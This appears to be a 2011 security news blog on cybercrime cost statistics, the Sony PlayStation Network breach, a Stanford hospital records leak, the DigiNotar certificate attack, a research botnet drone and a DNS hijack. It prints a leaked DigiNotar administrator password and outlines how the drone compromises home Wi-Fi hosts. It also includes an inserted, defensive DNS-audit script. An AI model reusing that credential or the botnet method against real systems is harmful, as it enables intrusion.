          The 2011 Norton Cybercrime Report estimates the total cost of cybercrime at $388 billion per year, which includes $114 billion in direct theft and time spent resolving attacks plus another $274 billion for productive time victims lost due to cybercrimes being committed against them. In all, 589 million have been affected by cybercrime, 431 million of them in the past 12 months, the report says. The study the report is based on was carried out in 24 countries and included 19,636 interviews.
          The report says that compares to global drug trafficking, estimated at $411 billion. Cybercrime already surpasses the total of black market marijuana and cocaine sales, Norton says, which totals $288 billion.
The most common form crime takes is viruses and malware, with 54% experiencing them, followed by online scams (11%) and phishing (10%). Norton measured mobile phone crime and found that 10% fell victim, including smishing - phishing by SMS.

          Tracking in all 24 countries, the company found that 1 million people per day became victims of cybercrime. The more time individuals spend online, the more likely they were to be hit. Of those spending 49 hours online per week, 79% were victims, while the number was 64% for those who spent 24 hours or less online.

          Those numbers are three times higher than the number of victims of physical crimes. Nevertheless, Norton notes that 70% of those surveyed thought they would be safer online than in the real world over the next 12 months. Some of the problem is preventable, Norton says, noting that 41% of adults don't have updated security suites on their computers.

Sony Hires Ex-Homeland Security Official after PlayStation Hack

Sony has hired a former official at the US Department of Homeland Security (DHS) for the new post of chief information security officer, months after a massive hacking attack leaked information on 100 million user accounts on its games networks.

Philip Reitinger, formerly the director of Homeland Security's National Cyber Security Center, will join Sony in the newly created position of chief information security officer and a senior vice president.

The new hire signals a heightened seriousness by Sony in the aftermath of an intrusion into its online videogame service earlier this year. The breach compromised the personal information of more than 100 million accounts from its online networks, including the possible loss of some credit card information. Sony said there have been no reports of any credit card data theft. Sony shut down the PlayStation Network and Qriocity streaming video and music network on April 20, keeping the services offline for nearly one month. It took until July 4 for the services to be fully restored globally.

Nicole Seligman, a Sony executive vice president and the company's general counsel and corporate executive officer, will be Reitinger's boss. Reitinger has also worked for the Department of Defense and the Department of Justice and holds a law degree from Yale, Sony said.

20,000 Patient Records Breach at Stanford Hospital

           Last month Stanford University's hospital discovered a massive privacy breach when 20,000 emergency room records appeared online. The records included names, diagnosis codes, account numbers, dates of admission and discharge, and billing charges. Social Security numbers, birth dates, credit card accounts or other information that could potentially result in identity theft were not exposed. Even so, the hospital is offering free identity-protection services to all affected patients.
 
The Hospital released the following statement:
           "An electronic file that an outside vendor’s sub-contractor created and caused to be posted to a website contained limited information about patients seen in the Emergency Department of Stanford Hospital & Clinics between March 1 and August 31, 2009. The Hospital discovered this on August 22, 2011, and immediately took action to ensure removal of the file from the website, which was done within 24 hours. 

           A full investigation was launched, and Stanford Hospital & Clinics has been working very aggressively with the vendor to determine how this occurred, in violation of strong contract commitments to safeguard the privacy and security of patient information. The vendor, Multi Specialties Collection Services, is conducting its own investigation into how its contractor caused patient information to be posted to the website and the Hospital may take further action following completion of the investigation. 

           Information in the electronic file was limited to names, medical record numbers, hospital account numbers, emergency room admission/discharge dates, medical codes for the reasons for the visit, and billing charges. Information commonly associated with identity theft, such as credit card and social security numbers, was not included.
 
           The Hospital is strongly committed to protecting our patients’ information and immediately suspended work with the vendor. The Hospital notified affected patients quickly and also arranged for free identity protection services, though the data involved is not associated with identity theft.
This incident was not caused by the Hospital, and responsibility has been assumed by a contractor working with the vendor.

ComodoHacker responsible for DigiNotar Attack

          The hacker warns the Internet community that he has access to 4 other high-profile CAs, among them GlobalSign, a certification authority from the U.S. He threatens that he will use his power over the companies to issue false certificates, which will later become the weapon of his revenge against countries who deserve it. In his own words, he said “I won't talk so many detail for now, just I wanted to let the world know that ANYTHING you do will have consequences, ANYTHING your country did in past, you have to pay for it...”.

           As proof that he really did infiltrate DigiNotar, he shares the domain administrator password of the CA network: Pr0d@dm1n.

           "Around 300.000 unique requesting IPs to google.com have been identified," Fox-IT said in the report. On Aug. 4 the number of requests rose quickly until the certificate was revoked on Aug. 29. Of these IP (Internet Protocol) addresses, more than 99% originated from Iran. The list of IP addresses will be handed over to Google who can inform users that their e-mail might have been intercepted during this period, Fox-IT said.

          According to SC Magazine, Microsoft has also updated the Certificate Trust List (CTL) to remove any fake certificates. A total of 531 digital certificates were issued for domains that included google.com, the CIA, and Israel's Mossad. The hack implies that the current network setup and procedures at DigiNotar are not sufficiently secure to prevent this kind of attack.

Researchers develop botnet drone that targets Wi-Fi networks

          "SkyNET" measures 13x18 inches and fitted with Wi-Fi, 3G mobile data link, and Linux OS. Researchers at the Stevens Institute of Technology have developed 'SkyNET', a stealth network that connects hosts to a botmaster through a mobile drone. Measuring 13x18 inches, the drone is fitted with Wi-Fi, 3G mobile data link, a Linux Operating System, and is programmed to scour an urban area and compromise wireless networks, mostly used at homes.

          Personal networks are the most unsecured networks on the Internet. They often contain no security controls, unpatched machines, no logging or auditing, bad password management, and typically run wireless radio with poor security. Researchers Theodore Reed, Joseph Geis and Sven Dietrich hope that their experiment could preempt attacks that use out-of-band communication to control Internet hosts.

          They say that the SkyNET is used by a botmaster to command their botnet(s) without using the Internet. The network comprises machines on home Wi-Fi networks in a proximal urban area, and one or more autonomous attack drones. When a host is compromised it joins both the Internet-facing botnet, and the sun-facing SkyNET, say the researchers. Subsequent drone flights are used to issue command and control without ever linking the botmaster to the botnet via the Internet.

          The researchers say that SkyNET takes advantage of poorly configured wireless network security, and poor trust configurations on mobile devices, to join networks and access devices locally using a mobile attack drone. The SkyNET drone is controllable via auto-pilot or via a 3G connection. The researchers say, "Once network access is acquired, the drone utilises an array of existing tools to compromise hosts, such as the Metasploit framework...The drone implements a 4-step attack procedure to enlist hosts into the network. We call this procedure PAAE (pilot, attack, attack, enlist)."

          To compensate for the limited computational power, the drone uses a 3G mobile data link to off-load computation to an Amazon Elastic Compute Cloud (EC2) GPU Cluster instance running cracking software.

The researchers say, "Once the drone has access to a compromised network its second task is to attack hosts; preferring non-mobile hosts. The botmaster can deploy an array of attack scripts or frameworks."

          "Once a host is compromised, the drone exchanges identification information, configures a callback mechanism, and secures the host as it is now a potential asset to SkyNET." They suggest that detection of a SkyNET may be possible by observing the behavior of the underlying botnet and discovering the geolocation of the bots.

Thursday, September 8, 2011

Turkish hacker group hijacks high-profile websites

          The websites themselves remain unaffected by this attack; the hacker group says they did this for fun.

          A Turkish hacker group diverted visitors to the websites of Vodafone, the Daily Telegraph, National Geographic and four other high-profile websites to the hacker group's own website on Sunday.

          The hackers were able to attack computers that hold web address information, deliberately mistranslating the real URL names to the IP address of the hackers' site. The four other high-profile websites are UPS, Betfair, Acer and technology news site the Register.

          However, it was reported the seven websites that were attacked by the group were not affected in terms of losing or compromising data to the group. A group called Turk Guvenligi carried out the attack by targeting domain name system (DNS), which is used to route users to websites.

          The records relating to the seven websites in DNS databases run by NetNames and Ascio were changed by the group in this attack. Both are subsidiaries of domain name management firm Group NBT.
The DNS server gets the first request when a user types an address, and then it translates the address into a computer-readable one known as a "dotted quad", according to the Guardian.

          The hackers broke into the DNS database at the "domain name registrar" company and changed the details recorded for the affected sites, after which DNS servers around the world start to copy the changed records and pass them on.

          This means that users can be directed to any web page by the hackers. The hacking group told the Guardian via Twitter that the purpose was: "Millions of dollars, large systems, small weaknesses and what I could do. Just for fun."
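Because a registrar-level change spreads as resolvers copy the new records, a site owner can catch it by comparing what resolvers return against a pinned baseline. The following is an added example, not something from the Guardian report or this post: it audits resolver answers for one name against the expected name servers and address ranges. The baseline, the three resolver observations and all names are constructed, and the observations are supplied as data so the check runs offline.

```python
import ipaddress

# Constructed baseline: the delegation and address ranges the owner expects.
BASELINE = {
    "www.corp.example": {
        "ns": {"ns1.dns-host.example", "ns2.dns-host.example"},
        "nets": ["192.0.2.0/24"],
    },
}

# Constructed answers as seen from three resolvers during propagation.
OBSERVATIONS = [
    {"resolver": "r1", "name": "www.corp.example",
     "ns": ["ns1.dns-host.example", "ns2.dns-host.example"], "a": ["192.0.2.10"]},
    {"resolver": "r2", "name": "www.corp.example",
     "ns": ["ns1.parked.example", "ns2.parked.example"], "a": ["203.0.113.66"]},
    {"resolver": "r3", "name": "WWW.corp.example.",
     "ns": ["NS1.DNS-HOST.EXAMPLE.", "ns2.dns-host.example"], "a": ["192.0.2.11"]},
]


def _norm(host):
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return host.lower().rstrip(".")


def audit(baseline, observations):
    """Return (resolver, name, kind, value) for every answer that departs
    from the baseline: an unknown name server or an address outside the
    expected networks."""
    findings = []
    for obs in observations:
        name = _norm(obs["name"])
        pinned = baseline.get(name)
        if pinned is None:
            continue  # not a monitored name
        nets = [ipaddress.ip_network(n) for n in pinned["nets"]]
        for ns in sorted({_norm(n) for n in obs["ns"]} - pinned["ns"]):
            findings.append((obs["resolver"], name, "unexpected-ns", ns))
        for addr in obs["a"]:
            ip = ipaddress.ip_address(addr)
            if not any(ip in net for net in nets):
                findings.append((obs["resolver"], name, "unexpected-a", addr))
    return findings


def hijack_suspected(findings):
    """Names for which one resolver reports both a changed delegation and a
    changed address, the pattern a registrar-level record change produces."""
    seen = {}
    for resolver, name, kind, _ in findings:
        seen.setdefault((resolver, name), set()).add(kind)
    return sorted({name for (_, name), kinds in seen.items()
                   if {"unexpected-ns", "unexpected-a"} <= kinds})


if __name__ == "__main__":
    results = audit(BASELINE, OBSERVATIONS)
    for row in results:
        print(row)
    print("suspected:", hijack_suspected(results))
```

Only resolver r2 diverges in the sample, which is what partial propagation looks like: resolvers that still hold cached records keep returning the old answers.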

Cybercrime costs the world $114bn annually: Norton study

          431 million adult victims globally in the past year. Cybercrime costs the world $114bn annually, and costs an additional $274bn in time lost due to victims' cybercrime experiences, according to the Norton Cybercrime Report 2011.

          With 431 million adult victims globally in the past year and at an annual price of $388bn globally based on financial losses and time lost, cybercrime costs the world significantly more than the global black market in marijuana, cocaine and heroin combined, at $288bn, the report said.

          More than two thirds of online adults (69%) have been a victim of cybercrime in their lifetime, while every second 14 adults become a victim of cybercrime, resulting in more than one million cybercrime victims every day.

          The report revealed that 10% of adults online have experienced cybercrime on their mobile phone.
According to the Symantec Internet Security Threat Report Volume 16, there were 42% more mobile vulnerabilities in 2010 compared to 2009.

          The number of reported new mobile operating system vulnerabilities increased from 115 in 2009 to 163 in 2010. Increased social networking and a lack of protection are likely to be some of the main culprits behind the growing number of cybercrime victims.

          While 74% of respondents say they are always aware of cybercrime, many are not taking the necessary precautions. 41% of adults indicated they don't have an up-to-date security software suite to protect their personal information online.